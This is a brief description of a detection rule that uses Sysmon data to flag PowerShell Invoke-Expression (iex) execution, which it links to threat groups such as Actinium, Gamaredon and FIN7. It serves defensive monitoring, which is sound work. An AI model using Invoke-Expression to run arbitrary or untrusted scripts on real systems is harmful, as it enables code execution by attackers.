This detection rule identifies the execution of the PowerShell command `Invoke-Expression`, which can be a vector for executing arbitrary commands in a PowerShell environment. `Invoke-Expression` is often leveraged by threat actors to execute malicious scripts or commands, making it a favorable tactic for various advanced persistent threat (APT) groups including Actinium, Gamaredon, and FIN7. The rule utilizes Sysmon event data to track when `invoke-expression` or its alias `iex` is invoked. By capturing this execution, organizations can detect potentially malicious activity that aligns with known attack patterns used by a variety of threat actors, particularly those associated with nation-state attacks and major cybercriminal groups. Organizations monitoring for this activity can enhance their defensive posture against PowerShell manipulations often employed in cyberattacks, particularly those targeting Windows environments.